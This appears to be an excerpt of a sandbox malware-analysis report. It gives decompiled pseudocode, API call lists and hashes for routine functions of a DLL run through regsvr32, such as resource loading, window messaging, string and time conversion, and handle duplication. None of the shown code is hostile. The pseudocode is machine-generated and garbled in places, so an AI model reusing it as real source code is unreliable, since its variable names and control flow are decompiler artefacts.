						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1001E302(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















                                                                                                                0x1001cb3c
                                                                                                                0x1001cb3e
                                                                                                                0x1001cb40
                                                                                                                0x1001cb43
                                                                                                                0x1001cb45
                                                                                                                0x1001cb47
                                                                                                                0x1001cb4a
                                                                                                                0x1001cb7f
                                                                                                                0x1001cb81
                                                                                                                0x1001cb84
                                                                                                                0x1001cb8b
                                                                                                                0x1001cb9d
                                                                                                                0x1001cba0
                                                                                                                0x1001cba5
                                                                                                                0x1001cba5
                                                                                                                0x1001cba0
                                                                                                                0x1001cbaf
                                                                                                                0x1001cbb9
                                                                                                                0x1001cbb9
                                                                                                                0x1001cbbf
                                                                                                                0x1001cbc2
                                                                                                                0x1001cbc6
                                                                                                                0x1001cbc6
                                                                                                                0x1001cb51
                                                                                                                0x1001cb5d
                                                                                                                0x1001cb65
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001cb69
                                                                                                                0x1001cb71
                                                                                                                0x1001cb74
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001cb7d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001CB5D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001CB69
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001CB77
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1001CBA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 18def020212d88c321c3418ad1c96af0b5642cd8fc256225538c1a3f4ae99b45
                                                                                                                • Instruction ID: 84066b9d9097212c52bf90a2407faf13656e6ac50be94e272473e2b97754f03b
                                                                                                                • Opcode Fuzzy Hash: 18def020212d88c321c3418ad1c96af0b5642cd8fc256225538c1a3f4ae99b45
                                                                                                                • Instruction Fuzzy Hash: 83112575600218EFDB00CFA5C889E9E7BA9EF06391F0080A9F9059B260CB75DD40CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001F85F Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001F85F(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4, intOrPtr _a8, long* _a12) {
				int _t32;
				intOrPtr* _t34;

				_t34 = _a4;
				E1001ECA1(__ebx, _t34, _a8);
				E100176B3( *((intOrPtr*)(_t34 + 4)), _a8,  &_a4);
				if( *_t34 == 0) {
					return SendMessageA(_a4, 0x18c, 0xffffffff,  *_a12);
				}
				_t32 = SendMessageA(_a4, 0x188, 0, 0);
				if(_t32 == 0xffffffff) {
					L100011D1(_a12);
				} else {
					SendMessageA(_a4, 0x189, _t32, E100103E6(_a12, SendMessageA(_a4, 0x18a, _t32, 0)));
				}
				return E1000FED3(_a12, 0xffffffff);
			}





                                                                                                                0x1001f863
                                                                                                                0x1001f86b
                                                                                                                0x1001f87a
                                                                                                                0x1001f882
                                                                                                                0x00000000
                                                                                                                0x1001f8e8
                                                                                                                0x1001f899
                                                                                                                0x1001f89e
                                                                                                                0x1001f8c7
                                                                                                                0x1001f8a0
                                                                                                                0x1001f8c0
                                                                                                                0x1001f8c0
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • SendMessageA.USER32 ref: 1001F897
                                                                                                                • SendMessageA.USER32 ref: 1001F8AB
                                                                                                                • SendMessageA.USER32 ref: 1001F8C0
                                                                                                                • SendMessageA.USER32 ref: 1001F8E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: bb8b93b29cdc21a8c4604f398b5d1714dde87c5f0dfe301a4339b9996be58f67
                                                                                                                • Instruction ID: 45fc29c7d7c029048f8d83dbd686a3256d7bfa0c3ff2d01b983806ece7dddab6
                                                                                                                • Opcode Fuzzy Hash: bb8b93b29cdc21a8c4604f398b5d1714dde87c5f0dfe301a4339b9996be58f67
                                                                                                                • Instruction Fuzzy Hash: BA115B35640158BBDF11DF54CC01FEE3B6AEF857A0F10822AB9255F1E0CB70A991EB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001136 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E10001136(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t26;
				short* _t37;
				void* _t41;
				int _t44;
				void* _t45;

				E100476B6(0x1008d877, __ebx, __edi, __esi);
				_t37 =  *(_t45 + 0x10);
				 *(_t45 - 0x9c) =  *(_t45 + 0x18);
				 *(_t45 - 0x94) = 0;
				 *((intOrPtr*)(_t45 - 4)) = 0;
				_t26 =  *0x100bb480(0x90);
				_t41 = WideCharToMultiByte;
				 *(_t45 - 0x98) = WideCharToMultiByte(_t26, 0, _t37,  *(_t45 + 0x14), 0, 0, 0, 0);
				L100013D9(_t45 - 0x94, _t27);
				WideCharToMultiByte( *0x100bb480(), 0, _t37,  *(_t45 + 0x14),  *(_t45 - 0x94),  *(_t45 - 0x98), 0, 0);
				if( *(_t45 + 0x14) == 0xffffffff) {
					 *(_t45 - 0x98) =  *(_t45 - 0x98) | 0xffffffff;
				}
				_t44 = GetStringTypeA( *(_t45 + 8),  *(_t45 + 0xc),  *(_t45 - 0x94),  *(_t45 - 0x98),  *(_t45 - 0x9c));
				_t32 = _t45 - 0x90;
				if( *(_t45 - 0x94) != _t45 - 0x90) {
					L10001456(_t32, _t45 - 0x94);
				}
				return E10047739(_t37, _t41, _t44);
			}








                                                                                                                0x10002c26
                                                                                                                0x10002c2e
                                                                                                                0x10002c33
                                                                                                                0x10002c39
                                                                                                                0x10002c3f
                                                                                                                0x10002c42
                                                                                                                0x10002c48
                                                                                                                0x10002c61
                                                                                                                0x10002c67
                                                                                                                0x10002c86
                                                                                                                0x10002c8c
                                                                                                                0x10002c8e
                                                                                                                0x10002c8e
                                                                                                                0x10002cb3
                                                                                                                0x10002cb5
                                                                                                                0x10002cc1
                                                                                                                0x10002cc9
                                                                                                                0x10002cc9
                                                                                                                0x10002cd5

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10002C26
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 10002C58
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000), ref: 10002C86
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?), ref: 10002CAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$H_prolog3_StringType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4071876553-0
                                                                                                                • Opcode ID: dc45e310e4773dfc17a91f6327da130c1a0d05a8a2bf473ab1728d07446f7c4b
                                                                                                                • Instruction ID: eb9dfadae4457c4fe509f2125d62d24f9feb02f871515aec6929ca7db0e99232
                                                                                                                • Opcode Fuzzy Hash: dc45e310e4773dfc17a91f6327da130c1a0d05a8a2bf473ab1728d07446f7c4b
                                                                                                                • Instruction Fuzzy Hash: 4D11D475801129ABEF219F708D49ECE7F79FF0A2A0F114191F61DA2262CB305A91DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035D3C Relevance: 6.1, APIs: 4, Instructions: 53fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10035D3C(void* __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t45;
				signed int _t46;
				void* _t48;
				void* _t51;

				_t51 = __eflags;
				_t39 = __edx;
				_t34 = __ecx;
				_t46 = _t48 - 0x90;
				_t19 =  *0x100b9e70; // 0xbb35530
				 *(_t46 + 0x8c) = _t19 ^ _t46;
				_t32 =  *(_t46 + 0x98);
				_push(_t40);
				E10013FEA(_t32, _t34, _t46, SetActiveWindow( *(__ecx + 0x20)));
				 *((intOrPtr*)(_t46 - 0x80)) = DragQueryFileA(_t32, 0xffffffff, 0, 0);
				_t25 = E1001E302(_t32, _t40, DragQueryFileA, _t51);
				 *(_t46 - 0x7c) =  *(_t46 - 0x7c) & 0x00000000;
				_t41 =  *((intOrPtr*)(_t25 + 4));
				if( *((intOrPtr*)(_t46 - 0x80)) > 0) {
					do {
						DragQueryFileA(_t32,  *(_t46 - 0x7c), _t46 - 0x78, 0x104);
						 *((intOrPtr*)( *_t41 + 0x88))(_t46 - 0x78);
						 *(_t46 - 0x7c) =  *(_t46 - 0x7c) + 1;
						_t25 =  *(_t46 - 0x7c);
					} while ( *(_t46 - 0x7c) <  *((intOrPtr*)(_t46 - 0x80)));
				}
				DragFinish(_t32);
				_pop(_t42);
				_pop(_t45);
				_pop(_t33);
				return E1004763E(_t25, _t33,  *(_t46 + 0x8c) ^ _t46, _t39, _t42, _t45);
			}


















                                                                                                                0x10035d3c
                                                                                                                0x10035d3c
                                                                                                                0x10035d3c
                                                                                                                0x10035d3d
                                                                                                                0x10035d4a
                                                                                                                0x10035d51
                                                                                                                0x10035d58
                                                                                                                0x10035d5f
                                                                                                                0x10035d6c
                                                                                                                0x10035d80
                                                                                                                0x10035d83
                                                                                                                0x10035d88
                                                                                                                0x10035d90
                                                                                                                0x10035d93
                                                                                                                0x10035d95
                                                                                                                0x10035da2
                                                                                                                0x10035dac
                                                                                                                0x10035db2
                                                                                                                0x10035db5
                                                                                                                0x10035db8
                                                                                                                0x10035d95
                                                                                                                0x10035dbe
                                                                                                                0x10035dca
                                                                                                                0x10035dcb
                                                                                                                0x10035dce
                                                                                                                0x10035ddb

                                                                                                                APIs
                                                                                                                • SetActiveWindow.USER32(?), ref: 10035D65
                                                                                                                • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10035D7E
                                                                                                                • DragQueryFileA.SHELL32(?,?,?,00000104), ref: 10035DA2
                                                                                                                • DragFinish.SHELL32(?), ref: 10035DBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892977027-0
                                                                                                                • Opcode ID: 3718def05f9739276a207ff4cb5d5e017117bdfa14ff6b46d5fbc272c63a4aaf
                                                                                                                • Instruction ID: abc6094ae129ad0afedea263d3c1b8f41d37affee122529c0778764e6e2a1fb5
                                                                                                                • Opcode Fuzzy Hash: 3718def05f9739276a207ff4cb5d5e017117bdfa14ff6b46d5fbc272c63a4aaf
                                                                                                                • Instruction Fuzzy Hash: EF114F719001189FEB20DBB8CC89FEDB7B9FF08315F114559E52597192DB75A9448F20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039067 Relevance: 6.1, APIs: 4, Instructions: 52timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10039067(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v36;
				intOrPtr _v48;
				void* __ebp;
				short _t24;
				int _t27;
				int _t29;
				intOrPtr _t38;
				intOrPtr _t48;
				void* _t55;
				void* _t58;

				_t49 = __edi;
				_t40 = __ebx;
				_t55 = _t58;
				if(_a8 != 0) {
					_push(__esi);
					_v28.wYear = L10038E4E();
					_v28.wMonth = L10038E6E();
					_v28.wDay = L10038E8A();
					_v28.wHour = L10038EA5();
					_v28.wMinute = L10038EC1();
					_t24 = L10038EDD();
					_v28.wMilliseconds = _v28.wMilliseconds & 0x00000000;
					_v28.wSecond = _t24;
					_t27 = SystemTimeToFileTime( &_v28,  &_v12);
					_t52 = GetLastError;
					if(_t27 == 0) {
						E10034B40(__ebx, __edi, GetLastError, _t55, GetLastError(), 0);
					}
					_t29 = LocalFileTimeToFileTime( &_v12, _a8);
					if(_t29 == 0) {
						_t29 = E10034B40(_t40, _t49, _t52, _t55, GetLastError(), _t29);
					}
					return _t29;
				} else {
					_push(_t55);
					_push(__ecx);
					_v36 = 0x100b8618;
					L10048E48( &_v36, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, __ebx, __edi, __esi);
					_t48 = E10020454(0x104);
					_v48 = _t48;
					_t38 = 0;
					_v36 = 0;
					if(_t48 != 0) {
						_t38 = E1001DB72(_t48);
					}
					return E10047725(_t38);
				}
			}















                                                                                                                0x10039067
                                                                                                                0x10039067
                                                                                                                0x10039068
                                                                                                                0x10039071
                                                                                                                0x10039078
                                                                                                                0x10039085
                                                                                                                0x10039090
                                                                                                                0x1003909b
                                                                                                                0x100390a6
                                                                                                                0x100390b1
                                                                                                                0x100390b5
                                                                                                                0x100390ba
                                                                                                                0x100390bf
                                                                                                                0x100390cb
                                                                                                                0x100390d3
                                                                                                                0x100390d9
                                                                                                                0x100390e0
                                                                                                                0x100390e0
                                                                                                                0x100390ec
                                                                                                                0x100390f4
                                                                                                                0x100390fa
                                                                                                                0x100390fa
                                                                                                                0x10039101
                                                                                                                0x10039073
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 100390CB
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 100390DD
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 100390EC
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 100390F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1172841412-0
                                                                                                                • Opcode ID: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
                                                                                                                • Instruction ID: 5c356f81747dbbd8dc38ca80da6bd8a9e3226f835241aec0ff8917524533ee0f
                                                                                                                • Opcode Fuzzy Hash: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
                                                                                                                • Instruction Fuzzy Hash: B9019228E10359AEDF12EBF58845ADE7BBCEF04651F004086E801AF241EF74E74487D9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002962B Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1002962B(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10009F14(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E100295EC(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E10034B40(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}















                                                                                                                0x1002962e
                                                                                                                0x10029633
                                                                                                                0x1002963d
                                                                                                                0x1002964a
                                                                                                                0x1002964a
                                                                                                                0x1002963f
                                                                                                                0x10029646
                                                                                                                0x10029646
                                                                                                                0x1002965d
                                                                                                                0x10029666
                                                                                                                0x1002966e
                                                                                                                0x1002966f
                                                                                                                0x10029673
                                                                                                                0x1002967b
                                                                                                                0x1002967b
                                                                                                                0x10029688
                                                                                                                0x10029688
                                                                                                                0x10029690
                                                                                                                0x10029696
                                                                                                                0x1002969e

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1002965D
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10029663
                                                                                                                • DuplicateHandle.KERNEL32 ref: 10029666
                                                                                                                • GetLastError.KERNEL32(?), ref: 10029681
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3704204646-0
                                                                                                                • Opcode ID: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
                                                                                                                • Instruction ID: 9a57ea4cd7946a0c25813fde5557cbd385d6f7a6745eee91706822166a40c99e
                                                                                                                • Opcode Fuzzy Hash: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
                                                                                                                • Instruction Fuzzy Hash: 9C018F75700200BFEB11DBA5DD89F9ABBE9EF84790F148465FA05CB251DBB1EC008B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100220CD Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E100220CD(intOrPtr __edi, intOrPtr __esi, int _a4) {
				signed int _v8;
				char _v264;
				void* __ebx;
				signed int _t7;
				long _t11;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t22;
				signed int _t27;

				_t25 = __esi;
				_t23 = __edi;
				_t7 =  *0x100b9e70; // 0xbb35530
				_v8 = _t7 ^ _t27;
				if(GetAtomNameA(_a4,  &_v264, 0x100) == 0) {
					_push(__esi);
					_push(__edi);
					_t11 = GetLastError();
					if(_t11 == 0x7a || _t11 == 0xea || GlobalGetAtomNameA(_a4,  &_v264, 0x100) != 0) {
						L8:
						_t13 = 1;
					} else {
						_t17 = GetLastError();
						if(_t17 == 0x7a || _t17 == 0xea) {
							goto L8;
						} else {
							_t13 = 0;
						}
					}
					_pop(_t23);
					_pop(_t25);
				} else {
					_t13 = 1;
				}
				return E1004763E(_t13, 0x100, _v8 ^ _t27, _t22, _t23, _t25);
			}












                                                                                                                0x100220cd
                                                                                                                0x100220cd
                                                                                                                0x100220d6
                                                                                                                0x100220dd
                                                                                                                0x100220f9
                                                                                                                0x10022100
                                                                                                                0x10022107
                                                                                                                0x10022108
                                                                                                                0x1002210d
                                                                                                                0x1002213c
                                                                                                                0x1002213e
                                                                                                                0x1002212d
                                                                                                                0x1002212d
                                                                                                                0x10022132
                                                                                                                0x00000000
                                                                                                                0x10022138
                                                                                                                0x10022138
                                                                                                                0x10022138
                                                                                                                0x10022132
                                                                                                                0x1002213f
                                                                                                                0x10022140
                                                                                                                0x100220fb
                                                                                                                0x100220fd
                                                                                                                0x100220fd
                                                                                                                0x1002214d

                                                                                                                APIs
                                                                                                                • GetAtomNameA.KERNEL32(?,?,00000100), ref: 100220F1
                                                                                                                • GetLastError.KERNEL32 ref: 10022108
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000100), ref: 10022123
                                                                                                                • GetLastError.KERNEL32 ref: 1002212D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
